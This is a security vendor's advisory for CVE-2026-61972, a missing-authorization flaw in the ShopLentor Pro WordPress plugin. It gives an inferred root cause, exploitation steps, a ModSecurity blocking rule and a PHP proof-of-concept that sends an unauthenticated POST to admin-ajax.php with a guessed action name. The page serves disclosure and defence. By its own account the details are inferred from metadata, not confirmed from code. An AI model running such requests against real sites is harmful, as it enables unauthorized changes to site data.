Published : August 6, 2026

CVE-2026-61972: ShopLentor Pro <= 2.8.5 Missing Authorization PoC, Patch Analysis & Rule

Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 2.8.5
Patched Version
Disclosed July 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-61972 (metadata-based): This vulnerability affects the ShopLentor Pro plugin for WordPress, specifically versions up to and including 2.8.5. It is a missing authorization vulnerability classified under CWE-862. The CVSS score is 5.3 (medium), with a vector of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N. The vulnerability allows unauthenticated attackers to perform unauthorized actions, potentially modifying certain data without authentication.

Root Cause: Based on the CWE classification and the vulnerability description, the root cause is a missing capability check on a function, likely an AJAX handler or an admin-post handler. In WordPress plugin development, developers often register AJAX actions for both authenticated and unauthenticated users, but fail to verify that the current user has the required capabilities (e.g., ‘manage_options’ or ‘edit_posts’). This is a common flaw. Atomic Edge analysis infers that the vulnerable function is likely accessible via the admin-ajax.php endpoint, where the action parameter matches the plugin’s registered hook. The patched version 2.8.6 likely adds a capability check (e.g., current_user_can) to restrict access to authorized users. Since no code diff is available, these conclusions are inferred from the CWE and description, not confirmed from source code.

Exploitation: An attacker can exploit this vulnerability by sending a crafted request to the WordPress AJAX endpoint, /wp-admin/admin-ajax.php, with the appropriate action parameter. The exact action parameter is unknown from the metadata, but based on the plugin slug ‘woolentor-addons-pro’, Atomic Edge analysis suggests common patterns such as ‘woolentor_pro_action’ or a specific function name. The request can be made as an unauthenticated user, meaning no login or nonce is required. The attacker would set the action parameter to the vulnerable handler and include any necessary additional parameters relevant to the unauthorized action. The impact is limited to integrity, as indicated by the CVSS vector, so the attacker can modify data but cannot read or delete it.

Remediation: The fix for this vulnerability requires adding a capability check to the affected function. The plugin developer should use WordPress functions like current_user_can() to verify the user has the necessary permission before performing the action. Additionally, for AJAX handlers, it is recommended to use check_ajax_referer() to verify nonces, though the primary issue is the missing capability check. The patched version 2.8.6 should include this fix, and users are advised to update immediately. Atomic Edge analysis recommends reviewing all AJAX handlers and admin-post handlers to ensure proper authorization checks are in place.

Impact: If exploited, an unauthenticated attacker can perform unauthorized actions that modify data or settings within the plugin. This could lead to changes in product listings, settings, or other data managed by ShopLentor Pro. The confidentiality and availability of the system are not affected, but the integrity of the data is compromised. In a WordPress environment, this could allow an attacker to alter plugin configurations, potentially leading to further exploitation or defacement of the site.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-61972 (metadata-based)
# Blocks unauthenticated access to ShopLentor Pro AJAX handler with missing authorization.
# The action parameter is inferred; adjust the regex pattern if the exact action is known.

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261972,phase:2,deny,status:403,chain,msg:'CVE-2026-61972 - ShopLentor Pro Missing Authorization',severity:'CRITICAL',tag:'CVE-2026-61972'"
  SecRule ARGS_POST:action "@rx ^woolentor_pro_" 
    "chain"
    SecRule REQUEST_METHOD "@streq POST" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-61972 - ShopLentor Pro <= 2.8.5 - Missing Authorization

/**
 * This PoC demonstrates unauthorized access to a ShopLentor Pro AJAX handler.
 * The exact action parameter is inferred from the plugin slug and common patterns.
 * Replace the ACTION constant with the confirmed vulnerable action if known.
 */

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Set your WordPress target URL
$action = 'woolentor_pro_unauthorized_action'; // Inferred action parameter (adjust as needed)

// Optional parameters for the unauthorized action
$data = array(
    'action' => $action,
    // Add any required parameters here, e.g., 'product_id' => 123
);

$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "Request sent successfully. Check response for unauthorized action execution.n";
    echo "Response body: n" . $response . "n";
} else {
    echo "Request failed with HTTP code: " . $http_code . "n";
}
?>

Frequently Asked Questions

Atomic Edge WAF security layer inspecting website traffic.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Black & McDonald logo representing Enterprise tier security and support for Atomic Edge WAF.Covenant House Toronto logo featuring a dove and text for Atomic Edge Enterprise planAlzheimer Society Canada logo representing trusted organizations and security partners.University of Toronto logo representing trusted organizations using Atomic Edge WAFSpecsavvers logo, trusted developers and organizations using Atomic Edge securityHarvard Medical School logo representing trusted organizations using Atomic Edge WAF.